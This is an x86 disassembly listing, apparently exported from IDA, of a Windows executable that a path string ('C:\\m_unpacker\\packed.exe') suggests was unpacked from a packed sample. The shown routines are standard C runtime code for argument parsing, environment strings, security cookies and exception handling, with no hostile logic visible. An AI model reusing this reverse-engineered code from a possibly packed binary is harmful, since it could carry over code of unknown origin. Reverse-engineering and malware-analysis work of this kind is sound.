		inc	esi

loc_40B0DB:				; CODE XREF: sub_40B06B+5Bj
		test	bl, bl
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		jz	short loc_40B117

loc_40B0E5:				; CODE XREF: sub_40B06B+3Cj
		cmp	[ebp+var_4], 0
		jnz	short loc_40B094
		cmp	bl, 20h
		jz	short loc_40B0F5
		cmp	bl, 9
		jnz	short loc_40B094

loc_40B0F5:				; CODE XREF: sub_40B06B+83j
		test	edx, edx
		jz	short loc_40B0FD
		mov	byte ptr [edx-1], 0

loc_40B0FD:				; CODE XREF: sub_40B06B+8Cj
					; sub_40B06B+ADj
		and	[ebp+var_4], 0

loc_40B101:				; CODE XREF: sub_40B06B+183j
		cmp	byte ptr [esi],	0
		jz	loc_40B1F3

loc_40B10A:				; CODE XREF: sub_40B06B+AAj
		mov	al, [esi]
		cmp	al, 20h
		jz	short loc_40B114
		cmp	al, 9
		jnz	short loc_40B11A

loc_40B114:				; CODE XREF: sub_40B06B+A3j
		inc	esi
		jmp	short loc_40B10A
; ---------------------------------------------------------------------------

loc_40B117:				; CODE XREF: sub_40B06B+78j
		dec	esi
		jmp	short loc_40B0FD
; ---------------------------------------------------------------------------

loc_40B11A:				; CODE XREF: sub_40B06B+A7j
		cmp	byte ptr [esi],	0
		jz	loc_40B1F3
		cmp	[ebp+arg_0], 0
		jz	short loc_40B132
		mov	eax, [ebp+arg_0]
		add	[ebp+arg_0], 4
		mov	[eax], edx

loc_40B132:				; CODE XREF: sub_40B06B+BCj
		inc	dword ptr [ecx]

loc_40B134:				; CODE XREF: sub_40B06B+16Ej
		xor	ebx, ebx
		inc	ebx
		xor	ecx, ecx
		jmp	short loc_40B13D
; ---------------------------------------------------------------------------

loc_40B13B:				; CODE XREF: sub_40B06B+D5j
		inc	esi
		inc	ecx

loc_40B13D:				; CODE XREF: sub_40B06B+CEj
		cmp	byte ptr [esi],	5Ch
		jz	short loc_40B13B
		cmp	byte ptr [esi],	22h
		jnz	short loc_40B16D
		test	cl, 1
		jnz	short loc_40B16B
		cmp	[ebp+var_4], 0
		jz	short loc_40B15E
		lea	eax, [esi+1]
		cmp	byte ptr [eax],	22h
		jnz	short loc_40B15E
		mov	esi, eax
		jmp	short loc_40B16B
; ---------------------------------------------------------------------------

loc_40B15E:				; CODE XREF: sub_40B06B+E5j
					; sub_40B06B+EDj
		xor	eax, eax
		xor	ebx, ebx
		cmp	[ebp+var_4], eax
		setz	al
		mov	[ebp+var_4], eax

loc_40B16B:				; CODE XREF: sub_40B06B+DFj
					; sub_40B06B+F1j
		shr	ecx, 1

loc_40B16D:				; CODE XREF: sub_40B06B+DAj
		test	ecx, ecx
		jz	short loc_40B183

loc_40B171:				; CODE XREF: sub_40B06B+113j
		dec	ecx
		test	edx, edx
		jz	short loc_40B17A
		mov	byte ptr [edx],	5Ch
		inc	edx

loc_40B17A:				; CODE XREF: sub_40B06B+109j
		inc	dword ptr [edi]
		test	ecx, ecx
		jnz	short loc_40B171
		mov	[ebp+arg_4], edx

loc_40B183:				; CODE XREF: sub_40B06B+104j
		mov	al, [esi]
		test	al, al
		jz	short loc_40B1DE
		cmp	[ebp+var_4], 0
		jnz	short loc_40B197
		cmp	al, 20h
		jz	short loc_40B1DE
		cmp	al, 9
		jz	short loc_40B1DE

loc_40B197:				; CODE XREF: sub_40B06B+122j
		test	ebx, ebx
		jz	short loc_40B1D8
		test	edx, edx
		movsx	eax, al
		push	eax
		jz	short loc_40B1C6
		call	sub_41054E
		test	eax, eax
		pop	ecx
		jz	short loc_40B1BA
		mov	al, [esi]
		mov	ecx, [ebp+arg_4]
		inc	[ebp+arg_4]
		mov	[ecx], al
		inc	esi
		inc	dword ptr [edi]

loc_40B1BA:				; CODE XREF: sub_40B06B+140j
		mov	ecx, [ebp+arg_4]
		mov	al, [esi]
		inc	[ebp+arg_4]
		mov	[ecx], al
		jmp	short loc_40B1D3
; ---------------------------------------------------------------------------

loc_40B1C6:				; CODE XREF: sub_40B06B+136j
		call	sub_41054E
		test	eax, eax
		pop	ecx
		jz	short loc_40B1D3
		inc	esi
		inc	dword ptr [edi]

loc_40B1D3:				; CODE XREF: sub_40B06B+159j
					; sub_40B06B+163j
		inc	dword ptr [edi]
		mov	edx, [ebp+arg_4]

loc_40B1D8:				; CODE XREF: sub_40B06B+12Ej
		inc	esi
		jmp	loc_40B134
; ---------------------------------------------------------------------------

loc_40B1DE:				; CODE XREF: sub_40B06B+11Cj
					; sub_40B06B+126j ...
		test	edx, edx
		jz	short loc_40B1E9
		mov	byte ptr [edx],	0
		inc	edx
		mov	[ebp+arg_4], edx

loc_40B1E9:				; CODE XREF: sub_40B06B+175j
		inc	dword ptr [edi]
		mov	ecx, [ebp+arg_8]
		jmp	loc_40B101
; ---------------------------------------------------------------------------

loc_40B1F3:				; CODE XREF: sub_40B06B+99j
					; sub_40B06B+B2j
		mov	eax, [ebp+arg_0]
		test	eax, eax
		pop	esi
		pop	ebx
		jz	short loc_40B1FF
		and	dword ptr [eax], 0

loc_40B1FF:				; CODE XREF: sub_40B06B+18Fj
		inc	dword ptr [ecx]
		leave
		retn
sub_40B06B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B203	proc near		; CODE XREF: sub_4044D2-BEp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		xor	ebx, ebx
		cmp	dword_436434, ebx
		push	esi
		push	edi
		jnz	short loc_40B21B
		call	sub_4051B3

loc_40B21B:				; CODE XREF: sub_40B203+11j
		push	104h
		mov	esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
		push	esi
		push	ebx
		mov	byte_427A3C, bl
		call	ds:dword_41D060	; GetModuleFileNameA
		mov	eax, dword_436458
		cmp	eax, ebx
		mov	off_4275E8, esi
		jz	short loc_40B249
		cmp	[eax], bl
		mov	[ebp+var_4], eax
		jnz	short loc_40B24C

loc_40B249:				; CODE XREF: sub_40B203+3Dj
		mov	[ebp+var_4], esi

loc_40B24C:				; CODE XREF: sub_40B203+44j
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		push	ebx
		push	ebx
		lea	edi, [ebp+var_C]
		call	sub_40B06B
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		cmp	eax, 3FFFFFFFh
		jnb	short loc_40B2B4
		mov	ecx, [ebp+var_C]
		cmp	ecx, 0FFFFFFFFh
		jnb	short loc_40B2B4
		mov	edi, eax
		shl	edi, 2
		lea	eax, [edi+ecx]
		cmp	eax, ecx
		jb	short loc_40B2B4
		push	eax
		call	sub_407AEA
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		jz	short loc_40B2B4
		mov	edx, [ebp+var_4]
		lea	eax, [ebp+var_8]
		push	eax
		add	edi, esi
		push	edi
		push	esi
		lea	edi, [ebp+var_C]
		call	sub_40B06B
		mov	eax, [ebp+var_8]
		add	esp, 0Ch
		dec	eax
		mov	dword_4275CC, eax
		mov	dword_4275D0, esi
		xor	eax, eax
		jmp	short loc_40B2B7
; ---------------------------------------------------------------------------

loc_40B2B4:				; CODE XREF: sub_40B203+65j
					; sub_40B203+6Dj ...
		or	eax, 0FFFFFFFFh

loc_40B2B7:				; CODE XREF: sub_40B203+AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40B203	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B2BC	proc near		; CODE XREF: sub_4044D2-C8p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ecx
		push	ecx
		mov	eax, dword_427A40
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, ds:dword_41D130
		xor	ebx, ebx
		xor	esi, esi
		cmp	eax, ebx
		push	2
		pop	ebp
		jnz	short loc_40B305
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jz	short loc_40B2EC
		mov	dword_427A40, 1
		jmp	short loc_40B30E
; ---------------------------------------------------------------------------

loc_40B2EC:				; CODE XREF: sub_40B2BC+22j
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40B300
		mov	eax, ebp
		mov	dword_427A40, eax
		jmp	short loc_40B305
; ---------------------------------------------------------------------------

loc_40B300:				; CODE XREF: sub_40B2BC+39j
		mov	eax, dword_427A40

loc_40B305:				; CODE XREF: sub_40B2BC+1Aj
					; sub_40B2BC+42j
		cmp	eax, 1
		jnz	loc_40B392

loc_40B30E:				; CODE XREF: sub_40B2BC+2Ej
		cmp	esi, ebx
		jnz	short loc_40B321
		call	edi	; GetEnvironmentStringsW
		mov	esi, eax
		cmp	esi, ebx
		jnz	short loc_40B321

loc_40B31A:				; CODE XREF: sub_40B2BC+DCj
					; sub_40B2BC+E8j ...
		xor	eax, eax
		jmp	loc_40B3EA
; ---------------------------------------------------------------------------

loc_40B321:				; CODE XREF: sub_40B2BC+54j
					; sub_40B2BC+5Cj
		cmp	[esi], bx
		mov	eax, esi
		jz	short loc_40B336

loc_40B328:				; CODE XREF: sub_40B2BC+71j
					; sub_40B2BC+78j
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B328
		add	eax, ebp
		cmp	[eax], bx
		jnz	short loc_40B328

loc_40B336:				; CODE XREF: sub_40B2BC+6Aj
		mov	edi, ds:dword_41D134
		push	ebx
		push	ebx
		push	ebx
		sub	eax, esi
		push	ebx
		sar	eax, 1
		inc	eax
		push	eax
		push	esi
		push	ebx
		push	ebx
		mov	[esp+38h+var_4], eax
		call	edi	; WideCharToMultiByte
		mov	ebp, eax
		cmp	ebp, ebx
		jz	short loc_40B387
		push	ebp
		call	sub_407AEA
		cmp	eax, ebx
		pop	ecx
		mov	[esp+18h+var_8], eax
		jz	short loc_40B387
		push	ebx
		push	ebx
		push	ebp
		push	eax
		push	[esp+28h+var_4]
		push	esi
		push	ebx
		push	ebx
		call	edi	; WideCharToMultiByte
		test	eax, eax
		jnz	short loc_40B383
		push	[esp+18h+var_8]
		call	sub_4039C3
		pop	ecx
		mov	[esp+18h+var_8], ebx

loc_40B383:				; CODE XREF: sub_40B2BC+B7j
		mov	ebx, [esp+18h+var_8]

loc_40B387:				; CODE XREF: sub_40B2BC+97j
					; sub_40B2BC+A6j
		push	esi
		call	ds:dword_41D138	; FreeEnvironmentStringsW
		mov	eax, ebx
		jmp	short loc_40B3EA
; ---------------------------------------------------------------------------

loc_40B392:				; CODE XREF: sub_40B2BC+4Cj
		cmp	eax, ebp
		jz	short loc_40B39A
		cmp	eax, ebx
		jnz	short loc_40B31A

loc_40B39A:				; CODE XREF: sub_40B2BC+D8j
		call	ds:off_41D13C
		mov	esi, eax
		cmp	esi, ebx
		jz	loc_40B31A
		cmp	[esi], bl
		jz	short loc_40B3B8

loc_40B3AE:				; CODE XREF: sub_40B2BC+F5j
					; sub_40B2BC+FAj
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B3AE
		inc	eax
		cmp	[eax], bl
		jnz	short loc_40B3AE

loc_40B3B8:				; CODE XREF: sub_40B2BC+F0j
		sub	eax, esi
		inc	eax
		mov	ebp, eax
		push	ebp
		call	sub_407AEA
		mov	edi, eax
		cmp	edi, ebx
		pop	ecx
		jnz	short loc_40B3D6
		push	esi
		call	ds:off_41D140
		jmp	loc_40B31A
; ---------------------------------------------------------------------------

loc_40B3D6:				; CODE XREF: sub_40B2BC+10Cj
		push	ebp
		push	esi
		push	edi
		call	sub_407FA0
		add	esp, 0Ch
		push	esi
		call	ds:off_41D140
		mov	eax, edi

loc_40B3EA:				; CODE XREF: sub_40B2BC+60j
					; sub_40B2BC+D4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		pop	ecx
		retn
sub_40B2BC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B3F1	proc near		; CODE XREF: sub_4044D2:loc_4043E6p
		push	esi
		push	edi
		mov	eax, offset dword_4215A0
		mov	edi, offset dword_4215A0
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B412

loc_40B403:				; CODE XREF: sub_40B3F1+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B40B
		call	eax

loc_40B40B:				; CODE XREF: sub_40B3F1+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B403

loc_40B412:				; CODE XREF: sub_40B3F1+10j
		pop	edi
		pop	esi
		retn
sub_40B3F1	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B415	proc near		; DATA XREF: sub_407D29+3Fo
		push	esi
		push	edi
		mov	eax, offset dword_4215A8
		mov	edi, offset dword_4215A8
		cmp	eax, edi
		mov	esi, eax
		jnb	short loc_40B436

loc_40B427:				; CODE XREF: sub_40B415+1Fj
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_40B42F
		call	eax

loc_40B42F:				; CODE XREF: sub_40B415+16j
		add	esi, 4
		cmp	esi, edi
		jb	short loc_40B427

loc_40B436:				; CODE XREF: sub_40B415+10j
		pop	edi
		pop	esi
		retn
sub_40B415	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B439	proc near		; CODE XREF: sub_4044D2p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_423064
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		push	ebx
		push	edi
		mov	edi, 0BB40E64Eh
		cmp	eax, edi
		mov	ebx, 0FFFF0000h
		jz	short loc_40B469
		test	eax, ebx
		jz	short loc_40B469
		not	eax
		mov	dword_423068, eax
		jmp	short loc_40B4C9
; ---------------------------------------------------------------------------

loc_40B469:				; CODE XREF: sub_40B439+21j
					; sub_40B439+25j
		push	esi
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41D1A0
		mov	esi, [ebp+var_4]
		xor	esi, [ebp+var_8]
		call	ds:dword_41D194	; GetCurrentProcessId
		xor	esi, eax
		call	ds:dword_41D0DC	; GetCurrentThreadId
		xor	esi, eax
		call	ds:dword_41D104	; GetTickCount
		xor	esi, eax
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41D058	; QueryPerformanceCounter
		mov	eax, [ebp+var_C]
		xor	eax, [ebp+var_10]
		xor	esi, eax
		cmp	esi, edi
		jnz	short loc_40B4AF
		mov	esi, 0BB40E64Fh
		jmp	short loc_40B4BA
; ---------------------------------------------------------------------------

loc_40B4AF:				; CODE XREF: sub_40B439+6Dj
		test	esi, ebx
		jnz	short loc_40B4BA
		mov	eax, esi
		shl	eax, 10h
		or	esi, eax

loc_40B4BA:				; CODE XREF: sub_40B439+74j
					; sub_40B439+78j
		mov	dword_423064, esi
		not	esi
		mov	dword_423068, esi
		pop	esi

loc_40B4C9:				; CODE XREF: sub_40B439+2Ej
		pop	edi
		pop	ebx
		leave
		retn
sub_40B439	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B4CD	proc near		; DATA XREF: sub_40B539o
					; .data:00423060o ...

arg_0		= dword	ptr  4

		push	edi
		mov	edi, [esp+4+arg_0]
		mov	eax, [edi]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B506
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B506
		mov	eax, [eax+14h]
		cmp	eax, 19930520h
		jz	short loc_40B501
		cmp	eax, 19930521h
		jz	short loc_40B501
		cmp	eax, 19930522h
		jz	short loc_40B501
		cmp	eax, 1994000h
		jnz	short loc_40B506

loc_40B501:				; CODE XREF: sub_40B4CD+1Dj
					; sub_40B4CD+24j ...
		call	sub_40C208

loc_40B506:				; CODE XREF: sub_40B4CD+Dj
					; sub_40B4CD+13j ...
		cmp	byte_427A48, 0
		push	esi
		jz	short loc_40B532
		push	dword_427A44
		call	sub_405543
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	short loc_40B532
		push	esi
		call	sub_410561
		test	eax, eax
		pop	ecx
		jz	short loc_40B532
		push	edi
		call	esi
		jmp	short loc_40B534
; ---------------------------------------------------------------------------

loc_40B532:				; CODE XREF: sub_40B4CD+41j
					; sub_40B4CD+53j ...
		xor	eax, eax

loc_40B534:				; CODE XREF: sub_40B4CD+63j
		pop	esi
		pop	edi
		retn	4
sub_40B4CD	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B539	proc near		; DATA XREF: _1fieagrn:0041D2E8o
		push	offset sub_40B4CD
		call	ds:dword_41D19C	; SetUnhandledExceptionFilter
		push	eax
		call	sub_4054D7
		mov	dword_427A44, eax
		pop	ecx
		mov	byte_427A48, 1
		xor	eax, eax
		retn
sub_40B539	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B55A	proc near		; DATA XREF: _1fieagrn:0041D304o
		cmp	byte_427A48, 0
		jz	short locret_40B57D
		push	dword_427A44
		call	sub_405543
		pop	ecx
		push	eax
		call	ds:dword_41D19C	; SetUnhandledExceptionFilter
		mov	byte_427A48, 0

locret_40B57D:				; CODE XREF: sub_40B55A+7j
		retn
sub_40B55A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B57E	proc near		; DATA XREF: _1fieagrn:004219F8o
		mov	dword ptr [ecx], offset	off_41DC34
		jmp	sub_40308A
sub_40B57E	endp

; ---------------------------------------------------------------------------

loc_40B589:				; DATA XREF: _1fieagrn:off_41DC34o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41DC34
		call	sub_40308A
		test	byte ptr [esp+8], 1
		jz	short loc_40B5A5
		push	esi
		call	sub_40332D
		pop	ecx

loc_40B5A5:				; CODE XREF: .text:0040B59Cj
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_40B5AB	proc near		; CODE XREF: sub_40B7EA+4Ep
					; sub_40BDB6+21Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		mov	eax, [edi+4]
		test	eax, eax
		jz	short loc_40B601
		lea	edx, [eax+8]
		cmp	byte ptr [edx],	0
		jz	short loc_40B601
		mov	esi, [esp+8+arg_4]
		mov	ecx, [esi+4]
		cmp	eax, ecx
		jz	short loc_40B5DF
		add	ecx, 8
		push	ecx
		push	edx
		call	sub_408380
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40B5DF

loc_40B5DB:				; CODE XREF: sub_40B5AB+3Cj
					; sub_40B5AB+4Bj ...
		xor	eax, eax
		jmp	short loc_40B604
; ---------------------------------------------------------------------------

loc_40B5DF:				; CODE XREF: sub_40B5AB+1Ej
					; sub_40B5AB+2Ej
		test	byte ptr [esi],	2
		jz	short loc_40B5E9
		test	byte ptr [edi],	8
		jz	short loc_40B5DB

loc_40B5E9:				; CODE XREF: sub_40B5AB+37j
		mov	eax, [esp+8+arg_8]
		mov	eax, [eax]
		test	al, 1
		jz	short loc_40B5F8
		test	byte ptr [edi],	1
		jz	short loc_40B5DB

loc_40B5F8:				; CODE XREF: sub_40B5AB+46j
		test	al, 2
		jz	short loc_40B601
		test	byte ptr [edi],	2
		jz	short loc_40B5DB

loc_40B601:				; CODE XREF: sub_40B5AB+Bj
					; sub_40B5AB+13j ...
		xor	eax, eax
		inc	eax

loc_40B604:				; CODE XREF: sub_40B5AB+32j
		pop	edi
		pop	esi
		retn
sub_40B5AB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B607	proc near		; CODE XREF: sub_40B64B+85p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0E0434F4Dh
		jz	short loc_40B62E
		cmp	eax, 0E06D7363h
		jnz	short loc_40B648
		call	sub_40574D
		and	dword ptr [eax+90h], 0
		jmp	sub_40C208
; ---------------------------------------------------------------------------

loc_40B62E:				; CODE XREF: sub_40B607+Dj
		call	sub_40574D
		cmp	dword ptr [eax+90h], 0
		jle	short loc_40B648
		call	sub_40574D
		add	eax, 90h
		dec	dword ptr [eax]

loc_40B648:				; CODE XREF: sub_40B607+14j
					; sub_40B607+33j
		xor	eax, eax
		retn
sub_40B607	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B64B	proc near		; CODE XREF: sub_40B8AC+ECp
					; sub_40BC58+36p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	10h
		push	offset dword_4218F0
		call	__SEH_prolog4
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		cmp	dword ptr [edi+4], 80h
		jg	short loc_40B66C
		movsx	esi, byte ptr [ebx+8]
		jmp	short loc_40B66F
; ---------------------------------------------------------------------------

loc_40B66C:				; CODE XREF: sub_40B64B+19j
		mov	esi, [ebx+8]

loc_40B66F:				; CODE XREF: sub_40B64B+1Fj
		mov	[ebp+var_1C], esi
		call	sub_40574D
		add	eax, 90h
		inc	dword ptr [eax]
		and	[ebp+ms_exc.disabled], 0

loc_40B682:				; CODE XREF: sub_40B64B+9Fj
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B6EC
		cmp	esi, 0FFFFFFFFh
		jle	short loc_40B691
		cmp	esi, [edi+4]
		jl	short loc_40B696

loc_40B691:				; CODE XREF: sub_40B64B+3Fj
		call	sub_40C254

loc_40B696:				; CODE XREF: sub_40B64B+44j
		mov	eax, esi
		shl	eax, 3
		mov	ecx, [edi+8]
		add	ecx, eax
		mov	esi, [ecx]
		mov	[ebp+var_20], esi
		mov	[ebp+ms_exc.disabled], 1
		cmp	dword ptr [ecx+4], 0
		jz	short loc_40B6C7
		mov	[ebx+8], esi
		push	103h
		push	ebx
		mov	ecx, [edi+8]
		push	dword ptr [ecx+eax+4]
		call	sub_40C2A0

loc_40B6C7:				; CODE XREF: sub_40B64B+65j
		and	[ebp+ms_exc.disabled], 0
		jmp	short loc_40B6E7
; ---------------------------------------------------------------------------

loc_40B6CD:				; DATA XREF: _1fieagrn:00421910o
		push	[ebp+ms_exc.exc_ptr]
		call	sub_40B607
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40B6D7:				; DATA XREF: _1fieagrn:00421914o
		mov	esp, [ebp+ms_exc.old_esp]
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [ebp+arg_8]
		mov	ebx, [ebp+arg_0]
		mov	esi, [ebp+var_20]

loc_40B6E7:				; CODE XREF: sub_40B64B+80j
		mov	[ebp+var_1C], esi
		jmp	short loc_40B682
; ---------------------------------------------------------------------------

loc_40B6EC:				; CODE XREF: sub_40B64B+3Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40B711
		cmp	esi, [ebp+arg_C]
		jz	short loc_40B702
		call	sub_40C254

loc_40B702:				; CODE XREF: sub_40B64B+B0j
		mov	[ebx+8], esi
		call	__SEH_epilog4
		retn
sub_40B64B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B70B	proc near		; DATA XREF: _1fieagrn:00421908o
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_40B70B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40B711	proc near		; CODE XREF: sub_40B64B+A8p
		call	sub_40574D
		cmp	dword ptr [eax+90h], 0
		jle	short locret_40B72B
		call	sub_40574D
		add	eax, 90h
		dec	dword ptr [eax]

locret_40B72B:				; CODE XREF: sub_40B711+Cj
		retn
sub_40B711	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B72C	proc near		; CODE XREF: sub_40B8AC+93p
		mov	eax, [eax]
		cmp	dword ptr [eax], 0E06D7363h
		jnz	short loc_40B76E
		cmp	dword ptr [eax+10h], 3
		jnz	short loc_40B76E
		mov	ecx, [eax+14h]
		cmp	ecx, 19930520h
		jz	short loc_40B757
		cmp	ecx, 19930521h
		jz	short loc_40B757
		cmp	ecx, 19930522h
		jnz	short loc_40B76E

loc_40B757:				; CODE XREF: sub_40B72C+19j
					; sub_40B72C+21j
		cmp	dword ptr [eax+1Ch], 0
		jnz	short loc_40B76E
		call	sub_40574D
		xor	ecx, ecx
		inc	ecx
		mov	[eax+20Ch], ecx
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40B76E:				; CODE XREF: sub_40B72C+8j
					; sub_40B72C+Ej ...
		xor	eax, eax
		retn
sub_40B72C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B771	proc near		; CODE XREF: sub_4069F0+112p
					; sub_40B9D2+6Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_421918
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short loc_40B7AE
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_40B7AE
		mov	eax, [ecx+1Ch]
		test	eax, eax
		jz	short loc_40B7AE
		mov	eax, [eax+4]
		test	eax, eax
		jz	short loc_40B7AE
		and	[ebp+ms_exc.disabled], 0
		push	eax
		push	dword ptr [ecx+18h]
		call	sub_4045E5
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40B7AE:				; CODE XREF: sub_40B771+11j
					; sub_40B771+19j ...
		call	__SEH_epilog4
		retn
sub_40B771	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		cmp	[ebp+0Ch], al
		setnz	al
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		jmp	sub_40C208

; =============== S U B	R O U T	I N E =======================================



sub_40B7C5	proc near		; CODE XREF: sub_40BA48+86p
					; sub_40BA48+113p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		mov	eax, [ecx]
		push	esi
		mov	esi, [esp+4+arg_0]
		add	eax, esi
		cmp	dword ptr [ecx+4], 0
		jl	short loc_40B7E8
		mov	edx, [ecx+4]
		mov	ecx, [ecx+8]
		mov	esi, [edx+esi]
		mov	ecx, [esi+ecx]
		add	ecx, edx
		add	eax, ecx

loc_40B7E8:				; CODE XREF: sub_40B7C5+11j
		pop	esi
		retn
sub_40B7C5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B7EA	proc near		; CODE XREF: sub_40BDB6+111p
					; sub_40BDB6+2AEp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_1		= byte ptr -1
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		test	edi, edi
		jnz	short loc_40B7FE
		call	sub_40C254
		jmp	sub_40C208
; ---------------------------------------------------------------------------

loc_40B7FE:				; CODE XREF: sub_40B7EA+8j
		and	[ebp+var_8], 0
		cmp	dword ptr [edi], 0
		mov	[ebp+var_1], 0
		jle	short loc_40B85E
		push	ebx
		push	esi

loc_40B80D:				; CODE XREF: sub_40B7EA+70j
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+1Ch]
		mov	eax, [eax+0Ch]
		mov	ebx, [eax]
		test	ebx, ebx
		lea	esi, [eax+4]
		jle	short loc_40B852
		mov	eax, [ebp+var_8]
		shl	eax, 4
		mov	[ebp+var_C], eax

loc_40B828:				; CODE XREF: sub_40B7EA+60j
		mov	ecx, [ebp+arg_0]
		push	dword ptr [ecx+1Ch]
		mov	eax, [esi]
		push	eax
		mov	eax, [edi+4]
		add	eax, [ebp+var_C]
		push	eax
		call	sub_40B5AB
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40B84E
		dec	ebx
		add	esi, 4
		test	ebx, ebx
		jg	short loc_40B828
		jmp	short loc_40B852
; ---------------------------------------------------------------------------

loc_40B84E:				; CODE XREF: sub_40B7EA+58j
		mov	[ebp+var_1], 1

loc_40B852:				; CODE XREF: sub_40B7EA+33j
					; sub_40B7EA+62j
		inc	[ebp+var_8]
		mov	eax, [ebp+var_8]
		cmp	eax, [edi]
		jl	short loc_40B80D
		pop	esi
		pop	ebx

loc_40B85E:				; CODE XREF: sub_40B7EA+1Fj
		mov	al, [ebp+var_1]
		leave
		retn
sub_40B7EA	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B863	proc near		; CODE XREF: sub_40BDB6+30Ap
		push	4
		mov	eax, offset loc_41C8BE
		call	sub_4049AF
		call	sub_40574D
		cmp	dword ptr [eax+94h], 0
		jz	short loc_40B882
		call	sub_40C254

loc_40B882:				; CODE XREF: sub_40B863+18j
		and	dword ptr [ebp-4], 0
		call	sub_40C241
		or	dword ptr [ebp-4], 0FFFFFFFFh
		jmp	sub_40C208
sub_40B863	endp


; =============== S U B	R O U T	I N E =======================================



sub_40B894	proc near		; DATA XREF: _1fieagrn:00421940o
		call	sub_40574D
		mov	ecx, [ebp+8]
		push	0
		push	0
		mov	[eax+94h], ecx
		call	sub_40456B
		int	3		; Trap to Debugger
sub_40B894	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40B8AC	proc near		; CODE XREF: sub_40BC58+57p

var_3C		= byte ptr -3Ch
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

; FUNCTION CHUNK AT 0040B9C7 SIZE 00000005 BYTES

		push	2Ch
